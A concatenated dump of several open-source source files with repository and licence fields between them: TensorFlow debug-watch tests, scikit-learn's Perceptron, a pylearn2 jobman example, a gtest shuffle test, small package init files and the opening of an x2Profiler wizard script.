cls._expected_num_nodes = 4 * 2 + 1 + 1 + 1 + 1
def setUp(self):
self._run_options = config_pb2.RunOptions()
def _verify_watches(self, watch_opts, expected_output_slot,
expected_debug_ops, expected_debug_urls):
"""Verify a list of debug tensor watches.
This requires all watches in the watch list have exactly the same
output_slot, debug_ops and debug_urls.
Args:
watch_opts: Repeated protobuf field of DebugTensorWatch.
expected_output_slot: Expected output slot index, as an integer.
expected_debug_ops: Expected debug ops, as a list of strings.
expected_debug_urls: Expected debug URLs, as a list of strings.
Returns:
List of node names from the list of debug tensor watches.
"""
node_names = []
for watch in watch_opts:
node_names.append(watch.node_name)
if watch.node_name == "*":
self.assertEqual(-1, watch.output_slot)
self.assertEqual(expected_debug_ops, watch.debug_ops)
self.assertEqual(expected_debug_urls, watch.debug_urls)
else:
self.assertEqual(expected_output_slot, watch.output_slot)
self.assertEqual(expected_debug_ops, watch.debug_ops)
self.assertEqual(expected_debug_urls, watch.debug_urls)
return node_names
def testAddDebugTensorWatches_defaultDebugOp(self):
debug_utils.add_debug_tensor_watch(
self._run_options, "foo/node_a", 1, debug_urls="file:///tmp/tfdbg_1")
debug_utils.add_debug_tensor_watch(
self._run_options, "foo/node_b", 0, debug_urls="file:///tmp/tfdbg_2")
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(2, len(debug_watch_opts))
watch_0 = debug_watch_opts[0]
watch_1 = debug_watch_opts[1]
self.assertEqual("foo/node_a", watch_0.node_name)
self.assertEqual(1, watch_0.output_slot)
self.assertEqual("foo/node_b", watch_1.node_name)
self.assertEqual(0, watch_1.output_slot)
# Verify default debug op name.
self.assertEqual(["DebugIdentity"], watch_0.debug_ops)
self.assertEqual(["DebugIdentity"], watch_1.debug_ops)
# Verify debug URLs.
self.assertEqual(["file:///tmp/tfdbg_1"], watch_0.debug_urls)
self.assertEqual(["file:///tmp/tfdbg_2"], watch_1.debug_urls)
def testAddDebugTensorWatches_explicitDebugOp(self):
debug_utils.add_debug_tensor_watch(
self._run_options,
"foo/node_a",
0,
debug_ops="DebugNanCount",
debug_urls="file:///tmp/tfdbg_1")
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(1, len(debug_watch_opts))
watch_0 = debug_watch_opts[0]
self.assertEqual("foo/node_a", watch_0.node_name)
self.assertEqual(0, watch_0.output_slot)
# Verify default debug op name.
self.assertEqual(["DebugNanCount"], watch_0.debug_ops)
# Verify debug URLs.
self.assertEqual(["file:///tmp/tfdbg_1"], watch_0.debug_urls)
def testAddDebugTensorWatches_multipleDebugOps(self):
debug_utils.add_debug_tensor_watch(
self._run_options,
"foo/node_a",
0,
debug_ops=["DebugNanCount", "DebugIdentity"],
debug_urls="file:///tmp/tfdbg_1")
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(1, len(debug_watch_opts))
watch_0 = debug_watch_opts[0]
self.assertEqual("foo/node_a", watch_0.node_name)
self.assertEqual(0, watch_0.output_slot)
# Verify default debug op name.
self.assertEqual(["DebugNanCount", "DebugIdentity"], watch_0.debug_ops)
# Verify debug URLs.
self.assertEqual(["file:///tmp/tfdbg_1"], watch_0.debug_urls)
def testAddDebugTensorWatches_multipleURLs(self):
debug_utils.add_debug_tensor_watch(
self._run_options,
"foo/node_a",
0,
debug_ops="DebugNanCount",
debug_urls=["file:///tmp/tfdbg_1", "file:///tmp/tfdbg_2"])
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(1, len(debug_watch_opts))
watch_0 = debug_watch_opts[0]
self.assertEqual("foo/node_a", watch_0.node_name)
self.assertEqual(0, watch_0.output_slot)
# Verify default debug op name.
self.assertEqual(["DebugNanCount"], watch_0.debug_ops)
# Verify debug URLs.
self.assertEqual(["file:///tmp/tfdbg_1", "file:///tmp/tfdbg_2"],
watch_0.debug_urls)
def testWatchGraph_allNodes(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_ops=["DebugIdentity", "DebugNanCount"],
debug_urls="file:///tmp/tfdbg_1")
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(self._expected_num_nodes, len(debug_watch_opts))
# Verify that each of the nodes in the graph with output tensors in the
# graph have debug tensor watch.
node_names = self._verify_watches(debug_watch_opts, 0,
["DebugIdentity", "DebugNanCount"],
["file:///tmp/tfdbg_1"])
# Verify the node names.
self.assertIn("a1_init", node_names)
self.assertIn("a1", node_names)
self.assertIn("a1/Assign", node_names)
self.assertIn("a1/read", node_names)
self.assertIn("b_init", node_names)
self.assertIn("b", node_names)
self.assertIn("b/Assign", node_names)
self.assertIn("b/read", node_names)
self.assertIn("c", node_names)
self.assertIn("p1", node_names)
self.assertIn("s", node_names)
# Assert that the wildcard node name has been created.
self.assertIn("*", node_names)
def testWatchGraph_nodeNameAllowlist(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_allowlist="(a1$|a1_init$|a1/.*|p1$)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(
sorted(["a1_init", "a1", "a1/Assign", "a1/read", "p1"]),
sorted(node_names))
def testWatchGraph_opTypeAllowlist(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
op_type_regex_allowlist="(Variable|MatMul)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(sorted(["a1", "b", "p1"]), sorted(node_names))
def testWatchGraph_nodeNameAndOpTypeAllowlists(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_allowlist="([a-z]+1$)",
op_type_regex_allowlist="(MatMul)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(["p1"], node_names)
def testWatchGraph_tensorDTypeAllowlist(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
tensor_dtype_regex_allowlist=".*_ref")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertItemsEqual(["a1", "a1/Assign", "b", "b/Assign"], node_names)
def testWatchGraph_nodeNameAndTensorDTypeAllowlists(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_allowlist="^a.*",
tensor_dtype_regex_allowlist=".*_ref")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertItemsEqual(["a1", "a1/Assign"], node_names)
def testWatchGraph_nodeNameDenylist(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_denylist="(a1$|a1_init$|a1/.*|p1$)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(
sorted(["b_init", "b", "b/Assign", "b/read", "c", "s"]),
sorted(node_names))
def testWatchGraph_opTypeDenylist(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
op_type_regex_denylist="(Variable|Identity|Assign|Const)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(sorted(["p1", "s"]), sorted(node_names))
def testWatchGraph_nodeNameAndOpTypeDenylists(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_denylist="p1$",
op_type_regex_denylist="(Variable|Identity|Assign|Const)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(["s"], node_names)
def testWatchGraph_tensorDTypeDenylists(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
tensor_dtype_regex_denylist=".*_ref")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertNotIn("a1", node_names)
self.assertNotIn("a1/Assign", node_names)
self.assertNotIn("b", node_names)
self.assertNotIn("b/Assign", node_names)
self.assertIn("s", node_names)
def testWatchGraph_nodeNameAndTensorDTypeDenylists(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_denylist="^s$",
tensor_dtype_regex_denylist=".*_ref")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertNotIn("a1", node_names)
self.assertNotIn("a1/Assign", node_names)
self.assertNotIn("b", node_names)
self.assertNotIn("b/Assign", node_names)
self.assertNotIn("s", node_names)
if __name__ == "__main__":
googletest.main()
| apache-2.0 |
altairpearl/scikit-learn | sklearn/linear_model/perceptron.py | 39 | 3863 | # Author: Mathieu Blondel
# License: BSD 3 clause
from .stochastic_gradient import BaseSGDClassifier
from ..feature_selection.from_model import _LearntSelectorMixin
class Perceptron(BaseSGDClassifier, _LearntSelectorMixin):
"""Perceptron
Read more in the :ref:`User Guide <perceptron>`.
Parameters
----------
penalty : None, 'l2' or 'l1' or 'elasticnet'
The penalty (aka regularization term) to be used. Defaults to None.
alpha : float
Constant that multiplies the regularization term if regularization is
used. Defaults to 0.0001
fit_intercept : bool
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered. Defaults to True.
n_iter : int, optional
The number of passes over the training data (aka epochs).
Defaults to 5.
shuffle : bool, optional, default True
Whether or not the training data should be shuffled after each epoch.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
verbose : integer, optional
The verbosity level
n_jobs : integer, optional
The number of CPUs to use to do the OVA (One Versus All, for
multi-class problems) computation. -1 means 'all CPUs'. Defaults
to 1.
eta0 : double
Constant by which the updates are multiplied. Defaults to 1.
class_weight : dict, {class_label: weight} or "balanced" or None, optional
Preset for the class_weight fit parameter.
Weights associated with classes. If not given, all classes
are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
Attributes
----------
coef_ : array, shape = [1, n_features] if n_classes == 2 else [n_classes,\
n_features]
Weights assigned to the features.
intercept_ : array, shape = [1] if n_classes == 2 else [n_classes]
Constants in decision function.
Notes
-----
`Perceptron` and `SGDClassifier` share the same underlying implementation.
In fact, `Perceptron()` is equivalent to `SGDClassifier(loss="perceptron",
eta0=1, learning_rate="constant", penalty=None)`.
See also
--------
SGDClassifier
References
----------
https://en.wikipedia.org/wiki/Perceptron and references therein.
"""
def __init__(self, penalty=None, alpha=0.0001, fit_intercept=True,
n_iter=5, shuffle=True, verbose=0, eta0=1.0, n_jobs=1,
random_state=0, class_weight=None, warm_start=False):
super(Perceptron, self).__init__(loss="perceptron",
penalty=penalty,
alpha=alpha, l1_ratio=0,
fit_intercept=fit_intercept,
n_iter=n_iter,
shuffle=shuffle,
verbose=verbose,
random_state=random_state,
learning_rate="constant",
eta0=eta0,
power_t=0.5,
warm_start=warm_start,
class_weight=class_weight,
n_jobs=n_jobs)
| bsd-3-clause |
pkainz/pylearn2 | pylearn2/scripts/jobman/tester.py | 44 | 3126 | """
This an example script inserting a pylearn2 yaml code into a jobman database.
The code below defines a yaml template string in state.yaml_template,
and the values of its hyper-parameters in state.hyper_parameters, and
run the code that is located in state.extract_results on this model
using jobman.
Actually, we add the job here and it can be launched later as usual
(please check how to start jobs using jobman from the jobman tutorial
website)
"""
from nose.plugins.skip import SkipTest
try:
from jobman.tools import DD, flatten
from jobman import api0, sql
except ImportError:
raise SkipTest()
from pylearn2.scripts.jobman import experiment
def result_extractor(train_obj):
"""
This is a user specific function, that is used by jobman to extract results
The returned dictionary will be saved in state.results
"""
import numpy
channels = train_obj.model.monitor.channels
train_cost = channels['sgd_cost(ExhaustiveSGD[X])']
best_epoch = numpy.argmin(train_cost.val_record)
best_rec_error = train_cost.val_record[best_epoch]
batch_num = train_cost.batch_record[best_epoch]
return dict(
best_epoch=best_epoch,
train_rec_error=best_rec_error,
batch_num=batch_num)
if __name__ == '__main__':
db = api0.open_db('sqlite:///test.db?table=test_jobman_pylearn2')
state = DD()
state.yaml_template = '''
!obj:pylearn2.train.Train {
"dataset": !obj:pylearn2.datasets.npy_npz.NpyDataset &dataset {
"file" : "%(file)s"
},
"model": !obj:pylearn2.autoencoder.ContractiveAutoencoder {
"nvis" : %(nvis)d,
"nhid" : %(nhid)d,
"irange" : 0.05,
"act_enc": "sigmoid", #for some reason only sigmoid function works
"act_dec": "sigmoid",
},
"algorithm": !obj:pylearn2.training_algorithms.sgd.SGD {
"learning_rate" : %(learning_rate)f,
"batch_size" : %(batch_size)d,
"monitoring_batches" : 5,
"monitoring_dataset" : *dataset,
"cost" : !obj:pylearn2.costs.cost.SumOfCosts {
"costs": [
[1.0, !obj:pylearn2.costs.autoencoder.MeanBinaryCrossEntropy {} ],
[%(coefficient)f, !obj:pylearn2.costs.cost.MethodCost { method: 'contraction_penalty' } ]
]
},
"termination_criterion" : %(term_crit)s,
}
}
'''
state.hyper_parameters = {
"file": "${PYLEARN2_DATA_PATH}/UTLC/pca/sylvester_train_x_pca32.npy",
"nvis": 32,
"nhid": 6,
"learning_rate": 0.1,
"batch_size": 10,
"coefficient": 0.5,
"term_crit": {
"__builder__": "pylearn2.training_algorithms.sgd.EpochCounter",
"max_epochs": 2
}
}
state.extract_results = "pylearn2.scripts.jobman.tester.result_extractor"
sql.insert_job(
experiment.train_experiment,
flatten(state),
db,
force_dup=True)
| bsd-3-clause |
shadda/AutobahnPython | autobahn/autobahn/__init__.py | 7 | 1043 | ###############################################################################
##
## Copyright 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from _version import __version__
version = __version__ # backward compat.
import util
import useragent
import flashpolicy
import httpstatus
import utf8validator
import xormasker
import websocket
import resource
import prefixmap
import wamp
| apache-2.0 |
julesy89/ttp-cpp | vendor/gmock-1.7.0/gtest/test/gtest_shuffle_test.py | 3023 | 12549 | #!/usr/bin/env python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that test shuffling works."""
__author__ = '[email protected] (Zhanyong Wan)'
import os
import gtest_test_utils
# Command to run the gtest_shuffle_test_ program.
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_shuffle_test_')
# The environment variables for test sharding.
TOTAL_SHARDS_ENV_VAR = 'GTEST_TOTAL_SHARDS'
SHARD_INDEX_ENV_VAR = 'GTEST_SHARD_INDEX'
TEST_FILTER = 'A*.A:A*.B:C*'
ALL_TESTS = []
ACTIVE_TESTS = []
FILTERED_TESTS = []
SHARDED_TESTS = []
SHUFFLED_ALL_TESTS = []
SHUFFLED_ACTIVE_TESTS = []
SHUFFLED_FILTERED_TESTS = []
SHUFFLED_SHARDED_TESTS = []
def AlsoRunDisabledTestsFlag():
return '--gtest_also_run_disabled_tests'
def FilterFlag(test_filter):
return '--gtest_filter=%s' % (test_filter,)
def RepeatFlag(n):
return '--gtest_repeat=%s' % (n,)
def ShuffleFlag():
return '--gtest_shuffle'
def RandomSeedFlag(n):
return '--gtest_random_seed=%s' % (n,)
def RunAndReturnOutput(extra_env, args):
"""Runs the test program and returns its output."""
environ_copy = os.environ.copy()
environ_copy.update(extra_env)
return gtest_test_utils.Subprocess([COMMAND] + args, env=environ_copy).output
def GetTestsForAllIterations(extra_env, args):
"""Runs the test program and returns a list of test lists.
Args:
extra_env: a map from environment variables to their values
args: command line flags to pass to gtest_shuffle_test_
Returns:
A list where the i-th element is the list of tests run in the i-th
test iteration.
"""
test_iterations = []
for line in RunAndReturnOutput(extra_env, args).split('\n'):
if line.startswith('----'):
tests = []
test_iterations.append(tests)
elif line.strip():
tests.append(line.strip()) # 'TestCaseName.TestName'
return test_iterations
def GetTestCases(tests):
"""Returns a list of test cases in the given full test names.
Args:
tests: a list of full test names
Returns:
A list of test cases from 'tests', in their original order.
Consecutive duplicates are removed.
"""
test_cases = []
for test in tests:
test_case = test.split('.')[0]
if not test_case in test_cases:
test_cases.append(test_case)
return test_cases
def CalculateTestLists():
"""Calculates the list of tests run under different flags."""
if not ALL_TESTS:
ALL_TESTS.extend(
GetTestsForAllIterations({}, [AlsoRunDisabledTestsFlag()])[0])
if not ACTIVE_TESTS:
ACTIVE_TESTS.extend(GetTestsForAllIterations({}, [])[0])
if not FILTERED_TESTS:
FILTERED_TESTS.extend(
GetTestsForAllIterations({}, [FilterFlag(TEST_FILTER)])[0])
if not SHARDED_TESTS:
SHARDED_TESTS.extend(
GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '1'},
[])[0])
if not SHUFFLED_ALL_TESTS:
SHUFFLED_ALL_TESTS.extend(GetTestsForAllIterations(
{}, [AlsoRunDisabledTestsFlag(), ShuffleFlag(), RandomSeedFlag(1)])[0])
if not SHUFFLED_ACTIVE_TESTS:
SHUFFLED_ACTIVE_TESTS.extend(GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1)])[0])
if not SHUFFLED_FILTERED_TESTS:
SHUFFLED_FILTERED_TESTS.extend(GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1), FilterFlag(TEST_FILTER)])[0])
if not SHUFFLED_SHARDED_TESTS:
SHUFFLED_SHARDED_TESTS.extend(
GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '1'},
[ShuffleFlag(), RandomSeedFlag(1)])[0])
class GTestShuffleUnitTest(gtest_test_utils.TestCase):
"""Tests test shuffling."""
def setUp(self):
CalculateTestLists()
def testShufflePreservesNumberOfTests(self):
self.assertEqual(len(ALL_TESTS), len(SHUFFLED_ALL_TESTS))
self.assertEqual(len(ACTIVE_TESTS), len(SHUFFLED_ACTIVE_TESTS))
self.assertEqual(len(FILTERED_TESTS), len(SHUFFLED_FILTERED_TESTS))
self.assertEqual(len(SHARDED_TESTS), len(SHUFFLED_SHARDED_TESTS))
def testShuffleChangesTestOrder(self):
self.assert_(SHUFFLED_ALL_TESTS != ALL_TESTS, SHUFFLED_ALL_TESTS)
self.assert_(SHUFFLED_ACTIVE_TESTS != ACTIVE_TESTS, SHUFFLED_ACTIVE_TESTS)
self.assert_(SHUFFLED_FILTERED_TESTS != FILTERED_TESTS,
SHUFFLED_FILTERED_TESTS)
self.assert_(SHUFFLED_SHARDED_TESTS != SHARDED_TESTS,
SHUFFLED_SHARDED_TESTS)
def testShuffleChangesTestCaseOrder(self):
self.assert_(GetTestCases(SHUFFLED_ALL_TESTS) != GetTestCases(ALL_TESTS),
GetTestCases(SHUFFLED_ALL_TESTS))
self.assert_(
GetTestCases(SHUFFLED_ACTIVE_TESTS) != GetTestCases(ACTIVE_TESTS),
GetTestCases(SHUFFLED_ACTIVE_TESTS))
self.assert_(
GetTestCases(SHUFFLED_FILTERED_TESTS) != GetTestCases(FILTERED_TESTS),
GetTestCases(SHUFFLED_FILTERED_TESTS))
self.assert_(
GetTestCases(SHUFFLED_SHARDED_TESTS) != GetTestCases(SHARDED_TESTS),
GetTestCases(SHUFFLED_SHARDED_TESTS))
def testShuffleDoesNotRepeatTest(self):
for test in SHUFFLED_ALL_TESTS:
self.assertEqual(1, SHUFFLED_ALL_TESTS.count(test),
'%s appears more than once' % (test,))
for test in SHUFFLED_ACTIVE_TESTS:
self.assertEqual(1, SHUFFLED_ACTIVE_TESTS.count(test),
'%s appears more than once' % (test,))
for test in SHUFFLED_FILTERED_TESTS:
self.assertEqual(1, SHUFFLED_FILTERED_TESTS.count(test),
'%s appears more than once' % (test,))
for test in SHUFFLED_SHARDED_TESTS:
self.assertEqual(1, SHUFFLED_SHARDED_TESTS.count(test),
'%s appears more than once' % (test,))
def testShuffleDoesNotCreateNewTest(self):
for test in SHUFFLED_ALL_TESTS:
self.assert_(test in ALL_TESTS, '%s is an invalid test' % (test,))
for test in SHUFFLED_ACTIVE_TESTS:
self.assert_(test in ACTIVE_TESTS, '%s is an invalid test' % (test,))
for test in SHUFFLED_FILTERED_TESTS:
self.assert_(test in FILTERED_TESTS, '%s is an invalid test' % (test,))
for test in SHUFFLED_SHARDED_TESTS:
self.assert_(test in SHARDED_TESTS, '%s is an invalid test' % (test,))
def testShuffleIncludesAllTests(self):
for test in ALL_TESTS:
self.assert_(test in SHUFFLED_ALL_TESTS, '%s is missing' % (test,))
for test in ACTIVE_TESTS:
self.assert_(test in SHUFFLED_ACTIVE_TESTS, '%s is missing' % (test,))
for test in FILTERED_TESTS:
self.assert_(test in SHUFFLED_FILTERED_TESTS, '%s is missing' % (test,))
for test in SHARDED_TESTS:
self.assert_(test in SHUFFLED_SHARDED_TESTS, '%s is missing' % (test,))
def testShuffleLeavesDeathTestsAtFront(self):
non_death_test_found = False
for test in SHUFFLED_ACTIVE_TESTS:
if 'DeathTest.' in test:
self.assert_(not non_death_test_found,
'%s appears after a non-death test' % (test,))
else:
non_death_test_found = True
def _VerifyTestCasesDoNotInterleave(self, tests):
test_cases = []
for test in tests:
[test_case, _] = test.split('.')
if test_cases and test_cases[-1] != test_case:
test_cases.append(test_case)
self.assertEqual(1, test_cases.count(test_case),
'Test case %s is not grouped together in %s' %
(test_case, tests))
def testShuffleDoesNotInterleaveTestCases(self):
self._VerifyTestCasesDoNotInterleave(SHUFFLED_ALL_TESTS)
self._VerifyTestCasesDoNotInterleave(SHUFFLED_ACTIVE_TESTS)
self._VerifyTestCasesDoNotInterleave(SHUFFLED_FILTERED_TESTS)
self._VerifyTestCasesDoNotInterleave(SHUFFLED_SHARDED_TESTS)
def testShuffleRestoresOrderAfterEachIteration(self):
# Get the test lists in all 3 iterations, using random seed 1, 2,
# and 3 respectively. Google Test picks a different seed in each
# iteration, and this test depends on the current implementation
# picking successive numbers. This dependency is not ideal, but
# makes the test much easier to write.
[tests_in_iteration1, tests_in_iteration2, tests_in_iteration3] = (
GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1), RepeatFlag(3)]))
# Make sure running the tests with random seed 1 gets the same
# order as in iteration 1 above.
[tests_with_seed1] = GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1)])
self.assertEqual(tests_in_iteration1, tests_with_seed1)
# Make sure running the tests with random seed 2 gets the same
# order as in iteration 2 above. Success means that Google Test
# correctly restores the test order before re-shuffling at the
# beginning of iteration 2.
[tests_with_seed2] = GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(2)])
self.assertEqual(tests_in_iteration2, tests_with_seed2)
# Make sure running the tests with random seed 3 gets the same
# order as in iteration 3 above. Success means that Google Test
# correctly restores the test order before re-shuffling at the
# beginning of iteration 3.
[tests_with_seed3] = GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(3)])
self.assertEqual(tests_in_iteration3, tests_with_seed3)
def testShuffleGeneratesNewOrderInEachIteration(self):
[tests_in_iteration1, tests_in_iteration2, tests_in_iteration3] = (
GetTestsForAllIterations(
{}, [ShuffleFlag(), RandomSeedFlag(1), RepeatFlag(3)]))
self.assert_(tests_in_iteration1 != tests_in_iteration2,
tests_in_iteration1)
self.assert_(tests_in_iteration1 != tests_in_iteration3,
tests_in_iteration1)
self.assert_(tests_in_iteration2 != tests_in_iteration3,
tests_in_iteration2)
def testShuffleShardedTestsPreservesPartition(self):
# If we run M tests on N shards, the same M tests should be run in
# total, regardless of the random seeds used by the shards.
[tests1] = GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '0'},
[ShuffleFlag(), RandomSeedFlag(1)])
[tests2] = GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '1'},
[ShuffleFlag(), RandomSeedFlag(20)])
[tests3] = GetTestsForAllIterations({TOTAL_SHARDS_ENV_VAR: '3',
SHARD_INDEX_ENV_VAR: '2'},
[ShuffleFlag(), RandomSeedFlag(25)])
sorted_sharded_tests = tests1 + tests2 + tests3
sorted_sharded_tests.sort()
sorted_active_tests = []
sorted_active_tests.extend(ACTIVE_TESTS)
sorted_active_tests.sort()
self.assertEqual(sorted_active_tests, sorted_sharded_tests)
if __name__ == '__main__':
gtest_test_utils.Main()
| gpl-2.0 |
esse-io/zen-common | oslo-modules/oslo_context/fixture.py | 3 | 1505 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
from oslo_context import context
class ClearRequestContext(fixtures.Fixture):
"""Clears any cached RequestContext
This resets RequestContext at the beginning and end of tests that
use this fixture to ensure that we have a clean slate for running
tests, and that we leave a clean slate for other tests that might
run later in the same process.
"""
def setUp(self):
super(ClearRequestContext, self).setUp()
# we need to clear both when we start, and when we finish,
# because there might be other tests running that don't handle
# this correctly.
self._remove_cached_context()
self.addCleanup(self._remove_cached_context)
def _remove_cached_context(self):
"""Remove the thread-local context stored in the module."""
try:
del context._request_store.context
except AttributeError:
pass
| apache-2.0 |
ehirt/odoo | addons/mrp/report/__init__.py | 378 | 1122 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import price
import workcenter_load
import bom_structure
import mrp_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
dob71/x2swn | x2Profiler.py | 1 | 38339 | #!/usr/bin/env python
#
# This file is part of the X2SW bundle. You can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Printrun. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import wx
import wx.wizard as wiz
import re
import tempfile
import shutil
from dulwich.client import get_transport_and_path
from dulwich.errors import ApplyDeltaError
from dulwich.index import Index, build_index_from_tree
from dulwich.pack import Pack, sha_to_hex
from dulwich.repo import Repo
from dulwich.server import update_server_info
from dulwich import client
VERSION_FILE = 'version.txt'
COMPAT_FILE = '.compat_ver_str.txt'
pronterface_restart = False
########################################################################
class TitledPage(wiz.WizardPageSimple):
""""""
#----------------------------------------------------------------------
def __init__(self, parent, title):
